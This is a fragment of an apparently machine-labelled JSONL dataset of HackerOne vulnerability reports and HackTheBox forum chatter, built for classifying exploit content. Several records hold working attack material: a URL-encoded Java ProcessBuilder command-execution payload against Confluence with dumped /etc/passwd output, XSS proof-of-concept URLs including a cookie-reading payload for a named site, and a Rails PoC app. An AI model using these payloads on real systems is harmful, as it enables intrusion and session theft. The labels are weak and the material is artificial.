/etc/passwd\\u0022)%3bvar+p+%3d+new+java.lang.ProcessBuilder()%3b+if(isWin){p.command(\\u0022cmd.exe\\u0022,+\\u0022/c\\u0022,+cmd)%3b+}+else{p.command(\\u0022bash\\u0022,+\\u0022-c\\u0022,+cmd)%3b+}p.redirectErrorStream(true)%3b+var+process%3d+p.start()%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader(process.getInputStream())%3b+var+bufferedReader+%3d+new+java.io.BufferedReader(inputStreamReader)%3b+var+line+%3d+\\u0022\\u0022%3b+var+output+%3d+\\u0022\\u0022%3b+while((line+%3d+bufferedReader.readLine())+!%3d+null){output+%3d+output+%2b+line+%2b+java.lang.Character.toString(10)%3b+}\\u0027)}%2b\\u0027\n\n```\n\nYou will see the output of the ifconfig command\n\nOUTPUT\n```\n type=\"hidden\"\n name=\"queryString\" value=\"aaaaaaaa[root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nconfluence:x:2002:2002::/var/atlassian/application-data/confluence:/bin/bash\n]\" />\n `\n- `math` and `style`: ``\n\nSee the following IRB session: \n```\nirb(main):016:0> require 'rails-html-sanitizer'\n=> false\nirb(main):017:0> Rails::Html::SafeListSanitizer.new.sanitize(\"\", tags: [\"svg\", \"style\"]).to_s\n=> \"\"\nirb(main):018:0> Rails::Html::SafeListSanitizer.new.sanitize(\"\", tags: [\"math\", \"style\"]).to_s\n=> \"\"\nirb(main):019:0> puts Rails::Html::Sanitizer::VERSION\n1.4.3\n=> nil \n```\n\n## Sample Vulnerable Rails Application\n\nTo build a sample rails application that is vulnerable, I've used the following `Dockerfile`:\n\n```\nFROM ruby:3.1.2\n\nRUN apt-get update && apt-get install -y vim\n\nWORKDIR /usr/src/app\nRUN gem install rails && rails new myapp\nWORKDIR /usr/src/app/myapp\n\n\nCOPY build-rails-app.sh ./build-rails-app.sh\nRUN sh ./build-rails-app.sh\nRUN RAILS_ENV=production rails assets:precompile\n\nCMD [\"./bin/rails\", \"server\", \"-b\", \"0.0.0.0\", \"-e\", \"production\"]\n```\n\nIn the same directory, put a shell script `build-rails-app.sh` which writes the app:\n\n```\n#!/ibn/sh\n\n# make routes\ncat << EOF > ./config/routes.rb\nRails.application.routes.draw do\n get \"/poc1\", to: \"poc1#index\"\n get \"/poc2\", to: \"poc2#index\"\nend\nEOF\n\n# make Poc1 endpoint\n# http://localhost:8888/poc1?name=%3Csvg%3E%3Cstyle%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/style%3E%3Csvg%3E\nbin/rails generate controller Poc1 index --skip-routes\n\ncat << EOF > ./app/controllers/poc1_controller.rb\nclass Poc1Controller < ApplicationController\n def index\n @name = params[:name] || \"put your name here\"\n end\nend\nEOF\n\n\ncat << EOF > ./app/views/poc1/index.html.erb\n

Hello <%= sanitize @name, tags: [\"svg\", \"style\"] %>

\n
\nPoC with a sanitized, reflected parameter 'name' for which 'svg' annd 'style' tags are allowed.\n
\n<%= link_to \"Go to PoC\", \"/poc1?name=\" %>\n
\n
\nUsing: rails-html-sanitizer <%= Rails::Html::Sanitizer::VERSION %>\nEOF\n\n\n# make Poc2 endpoint\n# http://localhost:8888/poc2?name=%3Cmath%3E%3Cstyle%3E%3Cimg%20src=x%20onerror=alert(1)%3E%3C/style%3E%3Cmath%3E\nbin/rails generate controller Poc2 index --skip-routes\n\ncat << EOF > ./app/controllers/poc2_controller.rb\nclass Poc2Controller < ApplicationController\n def index\n @name = params[:name] || \"put your name here\"\n end\nend\nEOF\n\n\ncat << EOF > ./app/views/poc2/index.html.erb\n

Hello <%= sanitize @name, tags: [\"math\", \"style\"] %>

\n
\nPoC with a sanitized, reflected parameter 'name' for which 'math' annd 'style' tags are allowed.\n
\n<%= link_to \"Go to PoC\", \"/poc2?name=\" %>\n
\n
\nUsing: rails-html-sanitizer <%= Rails::Html::Sanitizer::VERSION %>\nEOF\n```\n\nWith the following `Makefile` you can build and run the application\n\n```\n.PHONY: build\nbuild:\n\tdocker build -t local/railspoc:latest .\n\n.PHONY: run\nrun:\n\tdocker run -it --rm -p 127.0.0.1:8888:3000 local/railspoc:latest\n```\n\nNow you have a Rails application with two routes `/poc1` and `/poc2` running locally. Visit:\n- [http://localhost:8888/poc1?name=%3Csvg%3E%3Cstyle%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/style%3E%3Csvg%3E](http://localhost:8888/poc1?name=%3Csvg%3E%3Cstyle%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/style%3E%3Csvg%3E", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4ff2760734731cb6939a", "text": "[Cleartext Storage of Sensitive Information] user_ldap app logs user passwords in the log file on level debug\n\n## Summary:\nNextcloud using ldap user authentication and loglevel debug write user passwords to log file.\nVulnerable versions: 26.0.4, 27.0.1.\n\n## Steps To Reproduce:\n 1. Use a nextcloud with ldap user authentication.\n 2. Set nextcloud config loglevel to 0 (debug).\n 3. Login to nextcloud using a ldap user.\n 4. Search for lines with 'ldap_bind' in nextcloud log file.\n\n## Supporting Material/References:\nSample log file:\n```\n{\"reqId\":\"QRqbkhMpRAY1ugvQMrPk\",\"level\":0,\"time\":\"2023-08-08T11:17:11-03:00\",\"remoteAddr\":\"\",\"user\":\"--\",\"app\":\"user_ldap\",\"method\":\"POST\",\"url\":\"/login\",\"message\":\"Calling LDAP function ldap_bind with parameters [{},\\\"uid=\\\",\\\"\\\"]\",\"userAgent\":\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\",\"version\":\"27.0.1.2\",\"data\":{\"app\":\"user_ldap\"}}\n```\n\nAffected file:\n`apps/user_ldap/lib/LDAP.php`\n\nVulnerable code:\n```\n\tprivate function preFunctionCall(string $functionName, array $args): void {\n\t\t$this->curArgs = $args;\n\t\t$this->logger->debug('Calling LDAP function {func} with parameters {args}', [\n\t\t\t'app' => 'user_ldap',\n\t\t\t'func' => $functionName,\n\t\t\t'args' => json_encode($args),\n\t\t]);\n```\n\n## Impact\n\nLocal administrator can retriave user passwords.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "964907b35ec051e8ab30", "text": "can you help me the diggin in part i can’t get the flag", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-02-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d80aacf68344f3d0dcee", "text": "[Cross-site Scripting (XSS) - DOM] Cookie exfiltration through XSS on the main search request of www.lahitapiola.fi\n\n## Basic report information\n**Summary:** \nAdding extra search parameters generates the creation of new input fields which can be escaped, thus generating HTML injection possibilities, Cross-Site Scripting attacks, and the retrieval of the page's cookies.\n\n**Description:** \n\n - Observing the Bug\n\nI was researching the parameters of search bar from the main page. While search this creates links of the type: `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=testing`. By adding additional URL parameters, `&random=parameter`, the website creates hidden input fields with the `name` being the first word (random) and the `value` being the second word (parameter). See figure:\n\n{F1428608}\n\nBy creating a name variable with `\">`, such as `&random\">=parameter`, one can escape the input element. See figure:\n\n{F1428610}\n\nFull URL to replicate escape to HTML: `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=testing&random%22%3E=parameter`\n\nIn consequence, this allows an attacker to generate any html and to inject the page with any HTML elements. For example, ** a payload can be generated to display a link towards an attacker's website**. The following link, `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=test&other=anything&again%22/%3E%3C/div%3E%3Ca%20href%3D%22https://www.google.com%22%3EClicking%3C/a%3E%3Cinput%20type%3D%22hidden=alert`, does exactly that if a user clicks on the \"Clicking\" link.\n\n - XSS\n\nBasic protection impedes an attacker from triggering simple XSS payloads. However, through testing a certain payload works. See figure:\n\n{F1428612}\n\nBy hovering and moving around the screen over the *Click Me*, an XSS payload is executed.\n\nURL to reproduce: `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=test&other=anything&again%22/%3E%3C/div%3E%3Cdiv%2fOnpOinTeReNter%3dconfirm(document.domain)%3Eclick%20here%3Cinput%20type%3D%22hidden=alert`\n\n**Javascript payloads can run directly in the user's browser.**\n\n- Getting Cookies\n\nRetrieving the cookies was an extra step of difficulty, however, here is a payload that works and an image to show it working. The `document.cookie` command seems to be blocked but not the `self[Object.keys(self)[5]].cookie`. In consequence, to trigger this payload a few attempts might be required, the hardcoded `5` is the origin of this issue as Object.keys(self) changes in time I believe. I seem to make it work 1 out of 5 times.\n\n{F1428615}\n\nURL to reproduce: `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=test&other=anything&again%22/%3E%3C/div%3E%3Cdiv%2fOnpOinTeReNter%3dconfirm(self[Object.keys(self)[5]].cookie)%3Eclick%20here%3Cinput%20type%3D%22hidden=alert`\n\n**Cookies and session cookies can be retrieved and exfiltrated to an attacker using javascript.** This poses a risk on any user that is sent a link from anyone else.\n\n**Impact:**\nThe vulnerability allows for HTML injection, XSS, and cookie retrieval. The impact is important as the URL is the landing page of the website and is simply triggered through a link. In consequence, an attacker could send any user a link from the website and **retrieve their session cookies** or any commonly XSS attacks. The HTML injection allows a button to be injected redirecting towards any possible websites which is an **Open Redirect** vulnerability.\n\n## Browsers / Apps Verified In:\nWorks in (all up to date at the time of the report):\n * Google Chrome - Version 92.0.4515.159 (Official Build) (64-bit)\n * Microsoft Edge - Version 92.0.902.84 (Official build) (64-bit)\n\n## Steps To Reproduce:\n\n 1. Modify the URL parameters of the main page to escape an html element and inject any html element. URL:\n`https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=testing&random%22%3E=parameter`\n 2. With the new HTML element find a way to add an XSS payload. URL:\n `https://www.lahitapiola.fi/henkilo?pagename=LTSearchResults&q=test&other=anything&again%22/%3E%3C/div%3", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4696d812b4d17e35424d", "text": "[Use of Hard-coded Password] No character limit in password field\n\nHey, when I try to set the password while creating an account into \"UPchieve\" I noticed that you haven't kept any password limit.\nYou need to decrease password length: There are two reasons for limiting the password size. For one, hashing a large amount of data can cause significant resource consumption on behalf of the server and would be an easy target for a Denial Of Service attack.\nNormally all sites have a password minimum to maximum lengths like 72 characters limit or 48 limits to prevent Denial Of Service attack. in my SQL but in the website registration page, there are no limitations. Let me know if you need any more details.\nVulnerable Domain: https://upchieve.org/\nThis is typically not DoS, but a vulnerability that may lead to a DoS attack.\nFor my account into \"UPchieve\" with \"User: john\" and \"Mail : john.chris@mailcuk.com\", I use this password :\nT123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789123456789", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bd12d26ca397eade8b28", "text": "[Business Logic Errors] CVE-2023-27536: GSS delegation too eager connection re-use\n\nlibcurl would reuse a previously created connection even when the GSS delegation (CURLOPT_GSSAPI_DELEGATION) option had been changed that could have changed the user's permissions in a second transfer.\n\nlibcurl keeps previously used connections in a connection pool for subsequent transfers to reuse if one of them matches the setup. However, this GSS delegation setting was left out from the configuration match checks, making them match too easily, affecting krb5/kerberos/negotiate/GSSAPI transfers.\n\n## Hackerone report\n#1895135\n\n## Impact\n\nExisting connection that was established via more lax delegation will be reused for connection that should not succeed due to more restrictive delegation requested.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2023-27536"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "30043c5563abb1a492d6", "text": "i was having a similar issue with the question ‘How many files exist on the system that have the “.bak” extension?’ where i kept getting 1 as the answer until i realized i didnt ssh to the target than i got the correct answer of 4", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-07-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "69130c5832c6ad907392", "text": "So I did it, but I don’t know exactly which command was the one that worked. The flag.txt only appeared on the /tmp webpage after refreshing it. At the time I was trying another method using Burp to capture the packet(s) when copying and/or moving a document to the main page after it was moved to the /tmp page. Moving any document back to the main page caused the ‘malicious request denied’ message alert, but it did allow the document to be copied to the main page if it had originally been moved to /tmp. I also get the following message alerts a lot: “bash: /flag.txt: Permission denied”, and the \"Error while moving: mv: missing destination file operand after ‘/var/www/html/files/’ \". I’ve mainly been using the ||, && methods, but have tried various other URL-Encoded characters, and also injecting the input in the middle of the command rather than at the end, but all to no avail. If anyone is able to point me in the right direction, I would greatly appreciate it! Also, PM me if you want to exchange more detailed methods/ideas that we shouldn’t post here.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-07-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f118143aa9e2583db81a", "text": "Good Morning, Apollyon!!! I just wanted to let you know after reading post and comments, I decided to send a request to join your team. ( either d4rk3m0 or JTCHD007 ) I am still fairly to the community and I have never been in an ( Actually team ) before. I am looking forward to joining the team! if you have any questions, do not hesitate to DM me -JTCHD", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9fbda01109b377ada822", "text": "[Business Logic Errors] CVE-2023-27533: TELNET option IAC injection\n\ncurl supports communicating using the TELNET protocol and as a part of this it offers users to pass on user name and \"telnet options\" for the server negotiation.\n\nDue to lack of proper input scrubbing and without it being the documented functionality, curl would pass on user name and telnet options to the server as provided. This could allow users to pass in carefully crafted content that pass on content or do option negotiation without the application intending to do so. In particular if an application for example allows users to provide the data or parts of the data.\n\n## Hackerone report\n#1891474\n\n## Impact\n\nAttacker being able to specify TTYPE, XDISPLOC or NEW_ENV values is able to inject unintended TELNET commands to the telnet connection. Depending on the use case of the telnet protocol, this may allow the attacker to inject arbitrary controlling operations, or arbitrary input as if entered by the user manually.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2023-27533"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0b7ce8eff15daacc0fd3", "text": "[Unknown] Unrestricted File Upload on reddit.secure.force.com\n\n## Summary:\nReddit.secure.force.com is Reddit SalesForce instance. Attacker is able to send attachments of disallowed filetypes to this server. The attacker is able to send malicious documents such as CVE-2022-30190 Follina to the victim.\n\n## Impact:\nAttacker can send malicious files to whoever handles the form behind https://reddit.secure.force.com/adhelp\n\n## Steps To Reproduce:\n 1. Go to https://reddit.secure.force.com/adhelp \n 2. Notice that the specified allowed filetype is: jpg jpeg gif png pdf as you can see with the image below: \n\n{F1780944}\n\n 3. If you try dragging and dropping a docx file to that box, there is a Javascript which forbids such action. But if you used the \"Click to browse\" option you can start uploading the file.\n\n{F1780957}\n\n4. The file upload request: \n\n```http\nPOST /adhelp/apexremote HTTP/1.1\nHost: reddit.secure.force.com\n████████\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://reddit.secure.force.com/adhelp/\nX-User-Agent: Visualforce-Remoting\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 15301\nOrigin: https://reddit.secure.force.com\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"action\":\"AdvertisingHelpController\",\"method\":\"uploadFile\",\"data\":[\"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", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-30190"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e1688d334eb0f1782979", "text": "Hey guys a little help please. I see the the flag1.txt in the history of htb-student. But it is actually not present. please help", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-03-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "07b9f75498aa7b379fa4", "text": "[Allocation of Resources Without Limits or Throttling] HTTP multi-header compression denial of service\n\nA server can send an HTTP response with many occurrences of Transfer-Encoding and/or Content-Encoding headers. Each listed encoding allocates a buffer. The number of encodings listed within each header is already limited but the number of headers is not, allowing an HTTP response to consume all available memory.\n\n## Impact\n\nConsumes all available memory, resulting in a DoS.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "996e34bddac723727fdf", "text": "[Unknown] Escape Sequence Injection vulnerability in Rack\n\nDangerous bug in commonlogger of rack that allows to inject escape sequences in logs, the same bug alredy closed in webrick \nhttps://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection/\nLogger processes the query string correctly, but request metod printing as is.\nhttps://github.com/rack/rack/blob/master/lib/rack/common_logger.rb#L50\nTriggering request:\n```\nGET\\b\\b\\bPOST /sign_in?test1=1\\b2 HTTP/1.0\nHost: 127.0.0.1:4567\n```\nResult:\n``` \nRack::Lint::LintError: REQUEST_METHOD unknown: POST\n /usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:21:in `assert'\n /usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:340:in `check_env'\n /usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:44:in `_call'\n /usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:38:in `call'\n /usr/local/bundle/gems/rack-2.2.3/lib/rack/show_exceptions.rb:23:in `call'\n /usr/local/bundle/gems/rack-2.2.3/lib/rack/common_logger.rb:38:in `call'\n /usr/local/bundle/gems/sinatra-2.1.0/lib/sinatra/base.rb:253:in `call'\n /usr/local/bundle/gems/rack-2.2.3/lib/rack/content_length.rb:17:in `call'\n /usr/local/bundle/gems/rack-2.2.3/lib/rack/handler/webrick.rb:95:in `service'\n /usr/local/bundle/gems/webrick-1.7.0/lib/webrick/httpserver.rb:140:in `service'\n /usr/local/bundle/gems/webrick-1.7.0/lib/webrick/httpserver.rb:96:in `run'\n /usr/local/bundle/gems/webrick-1.7.0/lib/webrick/server.rb:310:in `block in start_thread'\n172.19.0.1 - - [29/Nov/2021:12:19:06 +0000] \"POST /sign_in?test1=1%082 HTTP/1.1\" 500 950 0.0006\n```\n\n## Impact\n\ninject malicious escape sequences to its logs, making it possible for dangerous control characters to be executed on a victim's terminal emulator", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6d40704059d46d71548d", "text": "BoxBuster: Harry is 1337 for anyone struggling please use this guide. Additionally, be sure to use the password policy from previous exercise in the module. I agree the question was poorly formulated. Took me more time to figure what the question was referring to that to answer. I guess that’s the point on a question right lol . Understanding even what the heck it means lol", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-06-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "64d9e17554c32f51886a", "text": "[Improper Authentication - Generic] Direct Access To admin Dashboard\n\n* This issue affect two Subdomains, https://data-stories-website.shopifycloud.com/admin.php `and` https://datastories.shopify.com/admin.php\n\n## Summary:\nHi Team,\nWhen Link to https://datastories.shopify.com/admin or https://data-stories-website.shopifycloud.com/admin the subdomain redirect you to https://shopify.okta.com/login/login.htm?fromURI=/oauth2/v1/authorize/redirect?okta_key=PJl7eQUE9mYSKrtADqQAMe6v3y_SA3iqFtstkVPavAA for OKTA authentication to perform non admins from the Admin dashboard at https://datastories.shopify.com/admin.\nBut non authentications users still can access the admin dashboard just by add any extintion to the admin word => https://datastories.shopify.com/admin.php .\nWhen link to https://datastories.shopify.com/admin.php You can see the admin dashboard for the subdomain and the information replaced in.\n* You can't discard, edit or create Globals while you are not authenticated, But you can still see administrative information.\n* When You press Ctrl+U you can see parameter called `authenticity_token` which admin csrf_token, This token can used to perform CSRF attack on the site admin **I can't perform for u the CSRF attack now for manu reasons, but accessing this token is critical issue**.\n\n## Steps To Reproduce:\n\n 1. Link to https://datastories.shopify.com/admin.php , and https://data-stories-website.shopifycloud.com/admin.php\n\n## Impact\n\nDirect access to admin dashboard", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8342de173c7546a980de", "text": "[Privacy Violation] Guests can continue to receive video streams from call after being removed from a conversation\n\n## 